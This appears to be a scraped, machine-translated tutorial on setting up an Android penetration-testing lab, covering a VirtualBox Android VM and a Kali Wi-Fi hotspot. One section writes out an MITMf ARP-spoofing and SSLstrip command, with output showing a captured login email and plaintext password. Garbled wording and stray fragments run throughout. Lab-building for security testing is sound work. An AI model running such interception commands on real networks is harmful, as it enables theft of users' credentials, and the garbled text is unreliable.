As a Bug Bounty Hunter and Penetration Tester for Android, we need a properly configured environment to test exploits and find vulnerabilities. This could be an Android virtual operating system or a dedicated network for capturing requests and performing man-in-the-middle attacks.
There are many ways to configure a pentesting lab. Virtual Android environments are enabled by projects such as VirtualBox, OSBoxes, and Androidx86. And there are a few advantages to creating an Android virtual machine on your Kali machine.
Virtual machines (VMs) are very easy to clone and recover if we accidentally repair or irreparably repair the Android system. In addition, we can bring the CPU and memory to a higher level than is possible with physical Android devices. For example, it is possible to create a virtual Android OS with 32 GB of RAM. Although this value is unbelievably high and unrealistic, it would theoretically allow us to run many applications and services simultaneously.
On the other hand, some readers may not have the available resource (such as RAM, CPU) to run an Android VM. Another environment we can set up requires a physical Android device and a dedicated Wi-Fi network. Sure, we can simply connect Kali and our Android device to our home Wi-Fi network, but use Kali as a Wi-Fi hotspot and route all Android data to to easily intercept data to and from the physical Device.
There are many conveniences in using a virtualized Android operating system, but it's not really comparable to a real physical phone that allows a real-world simulation of an Android device's response to a specific exploit or hack. That's why pentening a physical Android is my preferred method. But I'll show you how to set up both quickly and decide which one best fits your needs.
: Virtual Android Environment (VirtualBox Lab)
OSBoxes offers preconfigured Linux operating systems for our convenience. With the virtual OSBox Android machines for VirtualBox, we can set up and operate a virtual Android system with just a few clicks.
Go to the download page Android x86 Oboxes website to get the latest 64-bit Android image for VirtualBox
At the time of writing, OSBoxes supports only Android version 7.1 Nougat. Android Oreo (version 8.1) will be available soon. Readers with a more technical understanding of ISO installations can go to the Android x86 website and download the Oreo ISO file, which is not preconfigured as OSBox images.
Step 2: Extract the VirtualBox Image
x86_7.1_r1-VB-64bit.7z file (or the version you chose) is downloaded, extract the VirtualBox Disk Image (VDI) with it the following command 7z . Unzipping the .7z file may take several minutes. When it's done, there will be a new 64bit / directory in your downloads / directory.
7z x Android x86_7.1_r1-VB-64bit.7z 7-Zip  16.02: Copyright (c) 1999-2016 Igor Pavlov: 2016-05-21 p7zip Version 16.02 (locale = en_DE.UTF-8, Utf16 = on, HugeFiles = on, 64 bit, 4 CPUs AMD Ryzen 7 1700 Eight Core Processor (800F11), ASM, AES-NI) Search the drive for archives: 1 file, 927273974 bytes (885 MiB) Extract archive: Android x86_7.1_r1-VB-64bit.7z - Path = Android x86_7.1_r1-VB-64bit.7z Enter = 7z Physical size = 927273974 Header size = 204 Method = LZMA2: 25 Hard = - Blocks = 1 Everything is OK Folder: 1 Files: 1 Size: 5433720832 Compressed: 927273974
Step 3: Configure Android VM Settings
Open VirtualBox on your Kali system and create a new virtual machine with the "New" button. If you do not already have VirtualBox, you can download it for free from its website. On the first page, name "Android" and choose "Linux" as Type and Linux 2.6 64-bit for the Version . Click Next to continue.
Set the RAM to a value of at least 1,024 MB. Click Next to continue.
Select the "Use an Existing Virtual Hard Disk File" option on the Hard Disk Settings, then select the Android VDI in the 64bit / that we extracted earlier. Click "Create" to continue.
Then, with the new Android VM selected from the list of machines in VirtualBox, click on "Settings" then the "System" tab and adjust the Boot Order is configured so that the "Hard Disk" is the first option and the Pointing Device is configured to "PS / 2 Mouse".
Configure "Adapter 1" in the "Network" tab as "Bridged Adapter" and set the adapter adapter type in the "Advanced" menu to "PCnet-FAST III." This will allow the Android VM to connect to your wireless router and get its own IP address.
When you're done, click "OK" and start the Android VM After about 60 seconds, the operating system starts and we have access to a new one virtual Android operating system for experimentation and penstest.
In Bridged Mode Other devices on the Wi-Fi network can ping and interact with the Android operating system. We can run man-in-the-middle attacks against the operating system as if it were a physical device on the Wi-Fi network. Below is an example of a man-in-the-middle attack with MITMf.
python mitmf.py -i wlan0 --arp --spoof --gateway 192.168.0.1 - Destination 192.168.0.4 ███╗ ███╗██╗████████╗███╗ ███╗███████╗ ████╗ ████║██║╚══██╔══╝████╗ ████║██╔════╝ ██╔████╔██║██║ ██║ ██╔████╔██║█████╗ ██║╚██╔╝██║██║ ██║ ██║╚██╔╝██║██╔══╝ ██║ ╚═╝ ██║ ██║ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚═╝ [*] MITMf v0.9.8 - & # 39; The dark side & # 39; | | _ Net-Creds v1.0 online | _ Parody v0.6 | | _ ARP spoofing enabled | _ Sergio Proxy v0.2.1 online | _ SSLstrip v0.9 by Moxie Marlinspike online | | _ MITMf-API online * Serving Flask app "core.mitmfapi" (slow loading) | _ HTTP server online * Environment: Production WARNING: Do not use the development server in a production environment. Use a WSGI production server instead. * Debug mode: off * Runs on http://127.0.0.1:9999/ (press CTRL + C to exit) | DNSChef v0.4 online | _ SMB server online 2018-07-23 18:26:22 192.168.0.4 [type:Chrome-50 os:Android] login.website.com 2018-07-23 18:26:22 192.168.0.4 [type:Chrome-50 os:Android] login.website.com 2018-07-23 18:26:23 192.168.0.4 [type:Chrome-50 os:Android] fonts.googleapis.com 2018-07-23 18:26:24 192.168.0.4 [type:Chrome-50 os:Android] login.website.com 2018-07-23 18:26:25 192.168.0.4 [type:Chrome-50 os:Android] Zapped a strict transport security header 2018-07-23 18:26:26 192.168.0.4 [type:Chrome-50 os:Android] login.website.com 2018-07-23 18:26:26 192.168.0.4 [type:Chrome-50 os:Android] login.website.com 2018-07-23 18:26:27 192.168.0.4 [type:Chrome-50 os:Android] fonts.gstatic.com 2018-07-23 18:26:28 192.168.0.4 [type:Chrome-50 os:Android] login.website.com 2018-07-23 18:26:48 192.168.0.4 [type:Chrome-50 os:Android] POST data (login.website.com): utf8 =% E2% 9C authenticity_token% 93% = j7bVyOKFLu 2BausgDzlIr0Z9H0Mmh% 2FoWSBZh9OyyCqvKNdPFtPL47fqRECBwN97gJmlYt4AgvI6e% 2FyDmcAvNeog% 3d% 3d% & users 5Bemail% 5D = distortion% 40nullbyte.com & users% 5Bpassword% 5D = secure_password_999 & Commit = & users% 5Bremember_me% 5D = 0 2018-07-23 18:26:49 192.168.0.4 [type:Chrome-50 os:Android] login.website.com
We can see the Android device ( 192.168.0.4 ) with Chrome version 50 sent a POST A request with an e-mail address and password in plain text
This method requires a dedicated (physical) Android device for testing an external Wi-Fi adapter to create a hotspot. The idea is that Kali effectively creates a Wi-Fi hotspot to which the Android device is connected. All data transferred to and from the Android device can be easily monitored without a man-in-the-middle attack. This is convenient for bug bounty hunters who use tools such as Burp Suite or Wireshark to examine packages at a very granular level.
If you do not have an Android phone that you can use as a pen test device, Amazon has plenty of cheap options for a test phone that will become a valuable asset in your pentesting toolkit.
Amazon Deals: Find Cheap Android Phones for Your Hacking Toolkit
Step 1: Create a New Wi-Fi Hotspot 19659007] To start, start Kali and connect an external one Kali-compatible wireless network adapter to the system. Open the Network Connections menu, click the + icon to add a Wi-Fi connection, and then choose Create.
Network Connection The settings vary slightly between the different versions of Kali. I use the XFCE4 version, but all versions have a network manager that can create Wi-Fi hotspots with very similar steps.
Step 2: Configure the Hotspot & Password
A new edit window will pop up. The required fields are SSID Mode and Device . Make sure you use the "hotspot" mode and select the device (probably wlan0 ) of your wireless adapter. If you do not know the name of the network adapter, you can use ifconfig to find out. The Wi-Fi network name (SSID) can be arbitrary. I use "zero byte" for this demonstration.
Next, click on the "Wi-Fi Security" tab and enter a strong password.  Hack Android: How to Build a Laboratory for Android Penetration Testing ” width=”532″ height=”532″ style=”max-width:532px;height:auto;”/>